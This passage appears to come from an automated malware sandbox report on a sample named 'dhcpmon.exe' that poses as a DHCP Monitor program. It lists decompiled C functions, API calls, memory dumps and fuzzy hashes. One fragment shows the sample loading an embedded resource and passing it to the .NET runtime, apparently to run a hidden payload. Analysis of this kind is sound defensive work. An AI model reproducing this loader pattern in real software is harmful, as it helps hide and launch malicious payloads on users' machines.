                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Program Files (x86)\DHCP Monitor
                                                                    • API String ID: 2709904686-2806157900
                                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                    • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                    • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                    0x00405d5b
                                                                    0x00405d5d
                                                                    0x00405d60
                                                                    0x00405d8c
                                                                    0x00405d65
                                                                    0x00405d6e
                                                                    0x00405d73
                                                                    0x00405d7e
                                                                    0x00405d81
                                                                    0x00405d9d
                                                                    0x00405d83
                                                                    0x00405d8a
                                                                    0x00000000
                                                                    0x00405d8a
                                                                    0x00405d96
                                                                    0x00405d9a
                                                                    0x00405d9a
                                                                    0x00405d94
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                    • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                    • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                    • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                    • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: dhcpmon.exe PID: 2896 Parent PID: 5932 dhcpmon.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                                                    0x00401e22
                                                                    0x00401e28

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                    • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                    • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                                                                    0x0040149f
                                                                    0x004014a5
                                                                    0x004014a9
                                                                    0x004014ec
                                                                    0x004014ee
                                                                    0x004014ee
                                                                    0x004014b7
                                                                    0x004014bb
                                                                    0x004014c7
                                                                    0x004014cd
                                                                    0x004014d3
                                                                    0x004014d8
                                                                    0x004014e0
                                                                    0x004014e0
                                                                    0x004014d8
                                                                    0x004014e6
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                    • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                      • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                    • ExitProcess.KERNEL32 ref: 004014EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                    • String ID: v4.0.30319
                                                                    • API String ID: 2372384083-3152434051
                                                                    • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                    • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                    • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                    • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 04D6B730
                                                                    • GetCurrentThread.KERNEL32 ref: 04D6B76D
                                                                    • GetCurrentProcess.KERNEL32 ref: 04D6B7AA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 04D6B803
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 4b8c7d4ad99ea8c811ced81fbd1d8dd23d931be0d5eb71e4d2213e00714193f6
                                                                    • Instruction ID: 0d988144e563d3bd61d56d756f3299473d28babdfb5acca4efe3068889318b35
                                                                    • Opcode Fuzzy Hash: 4b8c7d4ad99ea8c811ced81fbd1d8dd23d931be0d5eb71e4d2213e00714193f6
                                                                    • Instruction Fuzzy Hash: 2E5132B0D003599FEB10CFAAD988BDEBBF4EF48304F24855AE019A7750D774A944CB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6B6C0, Relevance: 6.1, APIs: 4, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: f1e7c35c62ac63f1fcb1cea86cf03066e890254a2a0629611a58af45d04c1e05
                                                                    • Instruction ID: 327fce671de5f9b18c718a7ba690a0286d2bb441e0b910ebeda2bcd7c5667d67
                                                                    • Opcode Fuzzy Hash: f1e7c35c62ac63f1fcb1cea86cf03066e890254a2a0629611a58af45d04c1e05
                                                                    • Instruction Fuzzy Hash: 9E5152B0D003498FEB10CFA9D6887DEBBF0AF48304F24855AE019A7390D774A944CB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6B6CB, Relevance: 6.1, APIs: 4, Instructions: 118threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 04D6B730
                                                                    • GetCurrentThread.KERNEL32 ref: 04D6B76D
                                                                    • GetCurrentProcess.KERNEL32 ref: 04D6B7AA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 04D6B803
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 626b0c0ba6f74f9a24e7297dcef316660e44d1b0f6bb9d5a49793f4fdc9fd270
                                                                    • Instruction ID: e892dc2f276bd9c2ab29e28d9aec708d1e658bb8ed0c72d9826b6ca96ca2af8a
                                                                    • Opcode Fuzzy Hash: 626b0c0ba6f74f9a24e7297dcef316660e44d1b0f6bb9d5a49793f4fdc9fd270
                                                                    • Instruction Fuzzy Hash: 7F5131B0D003498FEB14CFA9D5887DEBBF1AB48304F24856AE01AA7750D774A944CF66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                                                    0x004055c5
                                                                    0x004055cf
                                                                    0x004055d3
                                                                    0x004055e4
                                                                    0x004055e8
                                                                    0x004055ed
                                                                    0x004055f3
                                                                    0x004055f8
                                                                    0x004055fd
                                                                    0x00405602
                                                                    0x00405609
                                                                    0x004055d5
                                                                    0x004055d5
                                                                    0x004055d5
                                                                    0x00405614

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free
                                                                    • String ID:
                                                                    • API String ID: 3328510275-0
                                                                    • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                    • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                    • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                    • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 050917E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1ce0cc89625fec5614dc7578d343416146c5e9d4fb9227fcc58936ec2e98042e
                                                                    • Instruction ID: 2227e9a15ed7cedaeec976c556d10296238f7a1f4385303f96cb3365a51e8dd7
                                                                    • Opcode Fuzzy Hash: 1ce0cc89625fec5614dc7578d343416146c5e9d4fb9227fcc58936ec2e98042e
                                                                    • Instruction Fuzzy Hash: 6E225278F04207EFCF58DB94E588ABEB7B2FB89310F148556D41267369C734A841DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05095130, Relevance: 1.8, APIs: 1, Instructions: 323COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ab9b27bcca9cc9e2ad79c9ee9a7fb54d026b51aae5b71c538844225f4d834be
                                                                    • Instruction ID: ce97367c32dd8d83e09993bc0d6031c92a54f01de02136a1785752ee0467dbde
                                                                    • Opcode Fuzzy Hash: 7ab9b27bcca9cc9e2ad79c9ee9a7fb54d026b51aae5b71c538844225f4d834be
                                                                    • Instruction Fuzzy Hash: 51D15870A04209DFDF59DFA5E894EADB7B1FF49314F108569E802AB2A5D730EC81DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D693E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 04D6962E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 8e37d415f7f2b05d3f953f1af6d6fddc5602548ec6f7a32f30cd9d6aeef38e42
                                                                    • Instruction ID: 1418ef585175886ce22653e1a54f3e2b8c434fd2d34c8e7c0d3f69be66a92824
                                                                    • Opcode Fuzzy Hash: 8e37d415f7f2b05d3f953f1af6d6fddc5602548ec6f7a32f30cd9d6aeef38e42
                                                                    • Instruction Fuzzy Hash: 7E7124B0A00B058FD724DF2AD45579AB7F1FF88314F008A6DD49AD7A50DB34F8498B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6FBA3, Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f319ea215d0780b8afb876f7024af30afeeb5ed341bd6406dc91d344ea230849
                                                                    • Instruction ID: d6f719f653998c6a1490a9de039ae2839888d9c2f6af7f1aa206582d2ae82311
                                                                    • Opcode Fuzzy Hash: f319ea215d0780b8afb876f7024af30afeeb5ed341bd6406dc91d344ea230849
                                                                    • Instruction Fuzzy Hash: A1510371C00249AFDF05CF99D880ACDBFB2FF48314F24812AE919AB220D771A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D6FD0A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 4c5eb545a9816bd5f41f2e4ef8ff0183bd173f92d1dbec2104482bf0ea6c3118
                                                                    • Instruction ID: 2fb711a4c460f6bc42b298ba8157393f93899229e38c06f72f900ec9c145ceb8
                                                                    • Opcode Fuzzy Hash: 4c5eb545a9816bd5f41f2e4ef8ff0183bd173f92d1dbec2104482bf0ea6c3118
                                                                    • Instruction Fuzzy Hash: 1441B1B1D00349AFDF14CFA9D884ADEBBB5FF48314F24812AE819AB210D774A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 050945F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 050946B1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 9c397f6af4dbec107a4e8676c21cf0f496f404d0960b6bb69f7f6ee149ce74e3
                                                                    • Instruction ID: 3a28debdd2e6729ea6fe3913c51ad9cb80d11d13f9c118d699d12a311a19dacf
                                                                    • Opcode Fuzzy Hash: 9c397f6af4dbec107a4e8676c21cf0f496f404d0960b6bb69f7f6ee149ce74e3
                                                                    • Instruction Fuzzy Hash: F741EFB1C0065CCBDF24CFA9D884BCEBBB1BF49304F208059D409AB255DBB5694ACF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05093474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 050946B1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: fd00d8da1e13498c7cc7c35fec5c749fc9c7c47401c14ca13e3d7697a0b913dd
                                                                    • Instruction ID: 33202f4511de07b9bba5866b92fe33ea53842eb9fd9f2671b830e2e167333f30
                                                                    • Opcode Fuzzy Hash: fd00d8da1e13498c7cc7c35fec5c749fc9c7c47401c14ca13e3d7697a0b913dd
                                                                    • Instruction Fuzzy Hash: F741DDB1C0465CCADF24CFA9D844BCDBBB5BB49308F208069D409AB254DBB0694ACF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05092470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05092531
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: fff23b21918cff4791238f19f092cd5db1954454b365b854941b2152933a21b8
                                                                    • Instruction ID: 06c2ae5689eabd82cc9a8db8d3b393acdd593644f42e337b60d8aaa931a9b1bc
                                                                    • Opcode Fuzzy Hash: fff23b21918cff4791238f19f092cd5db1954454b365b854941b2152933a21b8
                                                                    • Instruction Fuzzy Hash: 904108B9A002069FDB14CF99D448AAEBBF6FB88314F148559D419AB325D774A841CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509B889, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0509B957
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateFromIconResource
                                                                    • String ID:
                                                                    • API String ID: 3668623891-0
                                                                    • Opcode ID: 4f5137bf02bc5e02e7a2fdbb88c23aafe90da817e388f8c7145b997a8dddd8d9
                                                                    • Instruction ID: 4a2bd53f54c14ed3e5252a736bc265fdf6db49d87fec9821d57cde639f318e50
                                                                    • Opcode Fuzzy Hash: 4f5137bf02bc5e02e7a2fdbb88c23aafe90da817e388f8c7145b997a8dddd8d9
                                                                    • Instruction Fuzzy Hash: CA31AB72904289AFDF11CFA9E805ADEBFF8EF19310F04805AE954A7261C335D854DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6FE0B, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 04D6FE9D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 344d3293208cf884039fe42e10a85572c0f5b063113148b55eda9a9a3cb8045b
                                                                    • Instruction ID: fccc1bf42e41db6e966e6d3d880767d19121d0634955e4919c3c4f2c493906b4
                                                                    • Opcode Fuzzy Hash: 344d3293208cf884039fe42e10a85572c0f5b063113148b55eda9a9a3cb8045b
                                                                    • Instruction Fuzzy Hash: B22189B1800209EFDB11DF95E945ACEBFF4EB48314F04855AE825B7252D330A904CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6BCF8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04D6BD87
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: ce7d388828bcead1c04e467d4b7140a9f66a217f5757e15da218ba45d257b4e9
                                                                    • Instruction ID: 8a699b2d1a9651f48ffae3be773aa8a2fd251dc538eefc4444b44adcfc770927
                                                                    • Opcode Fuzzy Hash: ce7d388828bcead1c04e467d4b7140a9f66a217f5757e15da218ba45d257b4e9
                                                                    • Instruction Fuzzy Hash: 812114B5D00209AFDB10CFA9D884ADEFBF4FB48320F14851AE829A7350D374A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04D6BD87
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 9245a0c0bd07730c6ef0fc0ecdeeb07c872e71ad25c4edb587a449066a72701c
                                                                    • Instruction ID: 99c7e53439531d2d93364c43023808c9a5d23bd62279135a53546f60a2b89f07
                                                                    • Opcode Fuzzy Hash: 9245a0c0bd07730c6ef0fc0ecdeeb07c872e71ad25c4edb587a449066a72701c
                                                                    • Instruction Fuzzy Hash: D721E4B5D00219AFDB10CFA9D884ADEFBF8FB48310F14841AE815A7710D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D68768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04D696A9,00000800,00000000,00000000), ref: 04D698BA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 4f6d3f78524713396fd5311d0df117b6e4f48da4b439d687f9d2dd0ad540887f
                                                                    • Instruction ID: d9c2978ad7441c3ab10fd6557dfd3f6dc00275537e0266bb3f37abdcbe22b239
                                                                    • Opcode Fuzzy Hash: 4f6d3f78524713396fd5311d0df117b6e4f48da4b439d687f9d2dd0ad540887f
                                                                    • Instruction Fuzzy Hash: 3211F2B6D002099FDB10CFAAC444ADEFBF4EB48324F14856AE419B7600D375A949CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D67EE9, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 04D67F5D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: e6215793b378ae5bf66a49866444e30034365db9442f0ed7801bf0fcd7ae7189
                                                                    • Instruction ID: faf40bbb08cdf90bd1eb963f5992d7d4a8eef9b434eb797f175f5a013eb65179
                                                                    • Opcode Fuzzy Hash: e6215793b378ae5bf66a49866444e30034365db9442f0ed7801bf0fcd7ae7189
                                                                    • Instruction Fuzzy Hash: 8B11DFB18043999FDB11CFA5D4443DEBFF4EB05314F04845ED4A6A7282D378AA09CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D69849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04D696A9,00000800,00000000,00000000), ref: 04D698BA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 3b91780f78389a54fa82170ce55c5558505042601f8502c167673d035a506643
                                                                    • Instruction ID: 5bfc579a2b52f337906175d971ce89e8e54e9d80d491946f17d84267b239a575
                                                                    • Opcode Fuzzy Hash: 3b91780f78389a54fa82170ce55c5558505042601f8502c167673d035a506643
                                                                    • Instruction Fuzzy Hash: 4E1112B6D002099FDB10CFAAD484ADEFBF4EB48320F14866AD429A7740D374A549CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509B8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0509B957
                                                                    Memory Dump Source
